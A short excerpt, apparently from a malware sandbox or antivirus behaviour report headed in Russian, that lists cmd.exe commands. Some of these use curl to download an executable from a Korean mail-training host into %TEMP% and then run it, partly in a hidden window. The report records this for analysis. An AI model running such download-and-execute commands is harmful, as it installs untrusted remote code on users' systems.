Техническая информация
- '<SYSTEM32>\cmd.exe' /c curl https://mailtraining.ecsc.go.kr:8888/common/malDownFilePath.do?trnKey=202208224h2tF73o^&type=fileDownload^&trnType=EML^&statType=XLS_RAN_EXEC --output %TEMP%\fileDownloader.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\fileDownloader.exe
- '<SYSTEM32>\cmd.exe' /c curl https://mailtraining.ecsc.go.kr:8888/common/malDownFilePath.do?trnKey=202208224h2tF73o^&type=fileDownload^&trnType=EML^&statType=XLS_RAN_EXEC --output %TEMP%\fileDownloader.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\fileDownloader.exe' (со скрытым окном)